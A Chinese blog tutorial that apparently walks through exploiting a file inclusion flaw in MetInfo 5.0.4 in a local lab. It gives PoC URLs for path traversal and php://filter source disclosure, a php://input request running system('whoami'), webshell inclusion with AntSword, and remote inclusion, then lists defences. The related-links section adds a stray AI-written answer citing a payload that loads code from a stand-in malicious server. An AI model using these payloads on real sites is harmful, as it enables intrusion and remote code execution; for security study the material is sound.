文件包含漏洞实战

已于 2023-08-31 21:43:51 修改
阅读量1.9k 收藏 4
点赞数 1
分类专栏: web渗透实战 文章标签: 文件包含 漏洞复现 web渗透 网络安全 漏洞实战
于 2023-08-31 21:01:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46367450/article/details/132611543
版权

加粗样式

文章目录

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

漏洞原理

PHP 文件包含是程序设计的基础功能之一,能够减少代码量,提高开发效率。但是使用文件包含功能时,有类似于以上测试代码的设计,实现了动态包含,就有产生文件包含漏洞的风险。如果实现动态包含的参数,Web 应用没有进行严格的校验,浏览器客户端用户可以影响控制被包含文件的路径,就会产生任意文件包含漏洞。

特点

无视文件扩展名读取文件内容。

无条件解析PHP 代码,为图片木马提供了出路。

利用方法

包含图片木马

中国蚁剑直接链接。

读取敏感文件

利用文件包含漏洞,也可以读取敏感文件。

前提条件:

目标文件存在(已知目标文件路径);

具有文件可读权限。

具体方法:

# 相对路径
?filepath=../../../../../../windows/system32/drivers/etc/hosts
# 绝对路径
?filepath=c:/windows/system32/drivers/etc/hosts
# 使用php 封装协议
?filepath=file://c:/windows/system32/drivers/etc/hosts

封装协议

image-20230831205736947

复现环境准备

可以到http://v.metinfo.cn/下载各个版本的metinfo,

也可以到我的网盘下载5.0.4版本的:https://pan.baidu.com/s/1PZjQNDgLL10E05ryKNchKw?pwd=yuan

漏洞点

经过对这个版本的metinfo进行代码审计,我们可以发现在about目录中的index.php中存在文件包含漏洞

/about/index.php

代码审计验证漏洞点

我们来看到这个index.php,如下图所示,其中定义了fmodule变量与module变量,其中require_once语句表示将某个文件引入当前文件,在这个代码中,通过require_once引入了module.php,并且最后引入了module变量,这就是文件包含的入口,如果我们能控制module的值,就很可能存在文件包含漏洞

about/index.php

image-20230831173311983

经过对index.php的分析,我们就要确认module值如何能被控制,于是我们就要进入module.php分析源码:

include/module.php

image-20230831173141002

如图所示代码,如果我们传的$fmodule不为7的,就会进入这个if的条件语句,然后对我们的$module进行初始化赋值,这是我们没办法控制的,因为里面的赋值语句都写好了,一个是存在数组里,一个就是直接返回404.html。所以我们不能让这个程序进入这个条件,因此我们需要控制变量$fmodule为7,这样程序就不会对$module进行赋值了。所以我们可以自己手动赋值,从而达到控制$module变量的值的目的。

读取敏感文件

读取文件的前提条件:

目标文件存在(已知目标文件路径);

具有文件可读权限。

经过以上的代码审计,我们可以写出如下poc进行测试:

/about/index.php?fmodule=7&module=c:/windows/system32/drivers/etc/hosts

image-20230831174442431

可以看到,我们成功获取到了hosts文件,但是这并不能证明是文件包含漏洞,因为这仅仅是把hosts文件读取出来了,最多能确定的是文件读取漏洞,所以我们可以写一个把phpinfo.php放到www的一个目录中,我们尝试访问phpinfo.php,看看能否解析成功,解析成功了就说明是文件包含漏洞。如图,我把phpinfo.php放到了这个目录:

image-20230831174714678

/about/index.php?fmodule=7&module=../../phpinfo.php

然后执行poc,如图所示

image-20230831174800167

成功输出php的信息,所以到此可以确认这里确实是具有文件包含漏洞。

最终,我们还能得出一个结论,具有文件包含漏洞其实代表有文件读取漏洞,但是有文件读取漏洞不能证明有文件包含漏洞。

文件包含漏洞+文件上传漏洞深度利用

经过上面的代码审计,我们可以确定有文件包含漏洞,又因为文件包含的特点:

  1. 无视文件扩展名读取文件内容
  2. 无条件解析PHP 代码

于是我们可以结合文件上传漏洞,上传一个图片马,让程序对我们的图片马进行读取,然后当做php解析,从而getshell。

经过我对这个版本的metinfo的功能点查找,在这个地方找到了上传功能:

image-20230831175415273

但是,我尝试多次上传,可能是因为环境的问题,显示上传成功,但是去目录查看,并没有我们上传的文件,肯定在其他地方可以成功上传文件,这里为了让大家看到效果,就直接手动将图片马放入这个metinfo的目录,不演示找文件上传的功能点了。因为我们的目的是:通过文件包含漏洞,让程序对我们的图片马进行解析,最终getshell。

这里我将图片马放到这个目录下:

image-20230831175738790

接下来通过文件包含漏洞,来包含我们的图片马

http://localhost/metinfo504/MetInfo5.0.4/about/index.php?fmodule=7&module=../shell.jpg

image-20230831175838687

从结果可以看到,我们的页面没有显示图片,说明是把图片当做php执行了,所以接下来就通过中国蚁剑尝试getshell

中国蚁剑-getshell

如图,蚁剑连接成功

image-20230831180013713

突破文件上传漏洞限制

文件包含漏洞要想实现深度利用,就需要借助文件上传漏洞,但是如果系统中没有文件上传漏洞呢?或者目标服务器没有暴露我们上传的文件路径呢?我们仅仅可以使用文件包含漏洞,这个时候就需要考虑到php的一些封装协议了,利用封装协议,可以读取PHP文件源码,可以执行PHP命令

读取文件源码

利用php://fileter 读取文件源码

条件

  1. 与php.ini的allow_url_fopen的开启与否无关
  2. 与php.ini的allow_url_include的开启与否无关
  3. 知道文件的路径
  4. 具有文件包含漏洞

poc

/about/index.php?fmodule=7&module=php://filter/read=convert.base64-encode/resource=show.php

image-20230831194727536

读取文件源码之后结果的Base64编码,需要进行解码,解码结果如下:

image-20230831194912151

如图可知,我们成功读取到了show.php的源码

执行PHP命令

条件

  1. 必须开启php.ini的allow_url_fopen
  2. 必须开启php.ini的allow_url_include
  3. 具有文件包含漏洞

poc

POST /metinfo504/MetInfo5.0.4/about/index.php?fmodule=7&module=php://input HTTP/1.1
Host: 10.9.75.168
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: HFS_SID_=0.912836692063138; PHPSESSID=a71e5r7upv1jm86jc01kvaius2; recordurl=%2Chttp%253A%252F%252F10.9.75.168%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php%253Ffmodule%253D7%2526module%253D..%252Fshell.jpg%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php%253Ffmodule%253D7%2526module%253Dshow.php%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php%253Fmodule%253Dshow.php%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php%253Fmodule%253Dshow.php%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Findex.php%253Ffmodule%253D7%2526module%253Dshow.php%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php%253Ffmodule%253D7%2526module%253Dshow.php%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php%253Fmodule%253Dshow.php%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php%253Fmodule%253D..%252F..%252Fphpinfo.php%2Chttp%253A%252F%252F10.9.75.168%252F%252Fmetinfo504%252FMetInfo5.0.4%252Fabout%252Findex.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

<?php
system("whoami");
?>

验证结果如下图:

image-20230831193904889

由上面的结果可知,我们利用php://input成功执行了php的命令。

但是前提是php的配置文件中开启了allow_url_fopen和allow_url_include

远程文件包含

由于前面的执行PHP命令的前提是php的配置文件中开启了allow_url_fopen和allow_url_include,既然开启了这两个配置,我们不如直接利用远程文件包含,直接包含我们的一句话木马,然后借助蚁剑getshell。

条件

  1. 必须开启php.ini的allow_url_fopen
  2. 必须开启php.ini的allow_url_include
  3. 具有文件包含漏洞

远程文件包含就是可以远程(方式)加载文件。可以通过php.ini 中的选项进行配置。

allow_url_fopen = On # 通过远程方式打开文件
allow_url_include = On# 通过远程方式包含文件

远程文件是php文件:

image-20230831200602294

远程文件是图片马也行

image-20230831200339043

从上面的实战操作可知,我们成功通过文件包含漏洞的远程文件包含getshell,我们现在来分析一下远程文件包含的优势与缺点:

优势:不需要知道文件的路径,我们只需要包含我们远程服务器的木马文件即可

缺点:需要开启php.ini的allow_url_fopen,allow_url_include配置

文件包含漏洞防御

尽量少的使用动态包含;

严格过滤被包含文件的路径;

将参数allow_url_include 设置为Off;

使用参数open_basedir 限定文件访问范围:

open_basedir = c:\phpstudy_2016\www\
文件包含漏洞实例操作
一枚努力的蛋蛋
08-23 1230
文件包含漏洞实例操作本地文件包含漏洞无限制本地文件包含漏洞session文件包含漏洞 本地文件包含漏洞 无限制本地文件包含漏洞 测试代码: 访问: 1.http://localhost/0x01.php?filename=D:/phpstudy/test.php(访问绝对路径,也可以访问其它盘) 2.http://localhost/0x01.php?filename=…/…/…/…/…/…/...
网络安全实验-文件上传漏洞文件包含漏洞、CSRF漏洞
qlbahuang的博客
07-21 1655
网络安全实验:文件上传,文件包含,CSRF
PHP文件包含漏洞攻防实战
weixin_33785972的博客
02-10 387
本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。 PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞,利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。 PHP文件包...
3.2 文件包含漏洞渗透实战(OWASP实战训练)
吾名招财的博客
06-25 1494
文本包含漏洞渗透实战
DVWA-File Inclusion实战篇--文件包含漏洞
weixin_58660073的博客
06-13 438
DVWA实战篇--文件包含漏洞 File Inclusion 漏洞介绍 为了使代码更加灵活,通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。对一个简单的 PHP 小程序来说,在不同的 PHP 脚本之间剪切或复制某一函数不是大问题, 但是当进入项目开发时,函数的数量将会变得相当庞大,并且函数具有较强的复杂性,这时你就会把它们保存到一个便于随时调用的函数库中,以便于该函数在整个项目中可以随时被调用。通常情况下这个函数库是一个文.
Web漏洞-文件包含漏洞超详细全解(附实例)
ran的博客
04-05 7537
",因为在进行文件包含的时候,回根据网站的脚本类型来执行文件内的内容,而这里网站的脚本类型本身就是php,所以不加"
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
文件包含漏洞-02】文件包含漏洞分类与原理及其空字符安全绕过实验
cc
02-22 3161
文件包含(file inclusion)漏洞,当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。本地文件包含LFI(local file inclusion):当被包含的文件在服务器本地时,可以通过文件路径(相对或绝对)加载(读取和打开)文件,就形成本地文件包含
网络安全】-文件上传漏洞实战-upload-labs(0~16)
weixin_65311462的博客
09-09 1691
准备:一句话木马:
【CTF】 文件包含漏洞——data伪协议 【详】
2302_79596028的博客
10-27 2880
本文详细介绍了在CTF比赛中关于文件包含漏洞的一种常用攻击方法——data伪协议
企业办公自动化系统,java,代码源文件,毕设,实战,真实项目
12-07
企业办公自动化系统是一套基于Java开发的真实项目源代码,专注于实现企业内部各项办公流程的自动化和数字化。该系统采用先进的Java技术,结合实际需求,打造了一个功能齐全、性能稳定的企业办公平台。 这份源码涵盖了企业办公的核心业务功能,如流程审批、文档管理、通讯录、日程安排等,可以满足企业在日常办公中的多种需求。代码结构清晰,逻辑严谨,融入了多种设计模式和最佳实践,展现了高质量的编码风格和系统架构设计。 通过学习和研究这份源码,Java开发者和学生可以提升对企业级应用开发的认知和技能水平。源码中包含了丰富的注释和文档,有助于理解系统的实现细节和业务流程。此外,它还可以作为毕业设计和实战项目的参考,提供宝贵的实践经验。 该源码具有很高的实用价值,企业可以根据自身需求进行定制和扩展,实现特定业务场景的自动化办公。同时,它也可以作为教学材料,用于教授Java企业级开发或软件工程相关课程,帮助学生更好地掌握实际项目开发的知识和技能。 总之,这份企业办公自动化系统的Java代码源文件是一份宝贵的资源,它提供了一个真实项目的参考实现,展现了企业级应用的开发标准和最佳实践。无论你是Java开发
Web安全实战系列:文件包含漏洞
gclome的博客
11-07 600
**本文转自:freebuf 山东安山** 前言 《Web安全实战》系列集合了WEB类常见的各种漏洞,笔者根据自己在Web安全领域中学习和工作的经验,对漏洞原理和漏洞利用面进行了总结分析,致力于漏洞准确性、丰富性,希望对WEB安全工作者、WEB安全学习者能有所帮助,减少获取知识的时间成本。 0x01 文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件...
文件包含漏洞——实例
weixin_54055099的博客
09-24 3331
文件包含漏洞的实例
【DVWA】File Inclusion文件包含实战
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
11-26 1215
安能有术无道有道无心,乐得仁心仁义正心行道。
文件包含所用协议实战
banliyaoguai的博客
08-28 762
这里是要想办法让程序走到if条件语句里面,也就是要读一个a变量并且使用file_get_contents读这个a然后a里面的内容是I want flag。这里过滤了input和filter和data,但是这里有一个上传文件,并且可以上传zip文件。这里过滤了很多协议,但是没有过滤php://filter所以直接读,由于读出来的是base64编码所以要解码。然后读取文件,这里系统是windows使用type来进行读取,成功读出flag。这里过滤了一些协议,但是没有过滤php://input这样的一个协议。
文件包含与PHP伪协议实战演练
墨子辰的博客
01-28 641
目录一、PHP中造成文件包含的四个函数二、本地文件包含、远程文件包含的区别三、PHP伪协议测试代码目标文件常用协议1、目录遍历获取flag2、php://input、php://filter3、file://4、data://5、zip:// 一、PHP中造成文件包含的四个函数 1、include() 、require() 当使用include()函数包含文件时,只有代码执行到 include() 函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行。 当使用require()函数包含文件时,只要
文件包含漏洞原理与实践
Galaxy_0的博客
02-25 656
文件包含漏洞原理与实践
南邮杯CTF 文件包含漏洞实战
永远是少年
12-14 1064
今天继续给大家介绍CTF刷题,本文主要内容是南邮杯CTF 文件包含漏洞实战。 一、题目简介 二、解题思路 三、解题实战
第七课 文件包含漏洞及代码防御
weixin_30299709的博客
06-17 171
挖掘文件包含漏洞 常见文件包含函数 include(),require(),include_once(),require_once()函数 函数区别 reqiure(可N次包含),require_once(只包含一次,默认第一次)和include(可N次包含),include_once(只包含一次,默认第一次). require在被包含的文件有错误发生时代码将不再往下执行(主文件) i...
文件包含漏洞靶场
最新发布
03-26
<think>好的,用户想找关于文件包含漏洞的靶场或练习环境。我需要先回忆一下相关的资料。记得用户提供的引用里提到了pikachu、DVWA和iwebsec这几个靶场,这些应该是常见的练习环境。首先,我应该整理这些信息,确认每个靶场的特点和文件包含漏洞的具体模块。 然后,用户的问题可能涉及到如何搭建这些靶场或者访问它们的链接。比如pikachu通常是在本地搭建,可能需要使用PHP环境,DVWA也是类似的,需要配置在本地服务器。iwebsec可能是一个在线的或者需要自己部署的靶场。另外,用户可能还关心其他可用的靶场,比如Upload Labs或者WebGoat,这些可能也包含相关的漏洞练习。 接下来,我需要确保提供的步骤清晰,比如如何访问每个靶场的具体路径,例如pikachu的远程文件包含漏洞的URL结构。同时,要注意引用对应的参考文献,比如引用[1]、[2]、[3]中的内容,确保信息的准确性。 用户可能还会有更深层次的需求,比如想了解如何利用这些靶场进行漏洞测试的具体方法,或者需要配置环境的指导。因此,在回答中可能需要包含一些基本的操作步骤,比如修改PHP配置、使用Docker搭建环境等,但可能用户没有明确提到这些,所以需要保持回答简洁,同时提供足够的信息让他们开始练习。 另外,生成的相关问题需要覆盖用户可能感兴趣的后续步骤,比如如何防御文件包含漏洞,或者具体的漏洞利用技巧,这样他们可以进一步学习。确保问题与主题紧密相关,并且基于提供的引用内容,避免偏离主题。 最后,检查回答是否符合格式要求:使用中文,数学公式正确(虽然这里可能不太需要),结构清晰,引用标识正确。确保没有使用Markdown,分点明确,语言自然。</think>以下是关于文件包含漏洞的靶场及练习环境推荐,结合文件包含漏洞的原理和测试方法: ### 1. 本地环境搭建类靶场 **Pikachu靶场** - 包含本地文件包含(LFI)和远程文件包含(RFI)漏洞模块,支持通过修改参数`filename`触发漏洞。例如: ```http http://localhost/pika/vul/fileinclude/fi_local.php?filename=file1.php ``` - 远程文件包含示例需配置服务器允许远程加载(如修改`allow_url_include=On`)[^1][^3]。 **DVWA靶场** - 提供文件包含漏洞的低、中、高三种难度环境。通过修改`page`参数包含恶意文件,例如: ```http http://localhost/dvwa/vulnerabilities/fi/?page=filetest.php ``` - 需结合Burp Suite等工具测试过滤规则。 ### 2. 在线/集成化靶场 **iwebsec靶场** - 支持本地文件包含漏洞测试,通过包含非PHP文件(如`.txt`)验证解析漏洞。例如: ```http http://靶场地址/fileinclude/1.php?file=../../test.txt ``` - 重点练习绕过路径限制的方法(如`../`遍历)[^2]。 **WebGoat** - 提供文件包含漏洞实战场景,需通过注入恶意代码实现目录遍历或远程文件加载。 ### 3. 漏洞利用扩展练习 - **Upload Labs靶场**:结合文件上传漏洞,上传含恶意代码的图片/文本文件,再通过文件包含执行。 - **Docker环境搭建**:使用Metasploitable或OWASP Broken Web Apps等镜像快速部署漏洞环境。 --- ### 文件包含漏洞原理补充 漏洞本质是未对包含的文件路径进行过滤,例如: ```php include($_GET['file']); ``` 攻击者可构造`file=../../etc/passwd`读取敏感文件,或`file=http://恶意服务器/shell.txt`加载远程代码[^2][^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yuan_boss

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值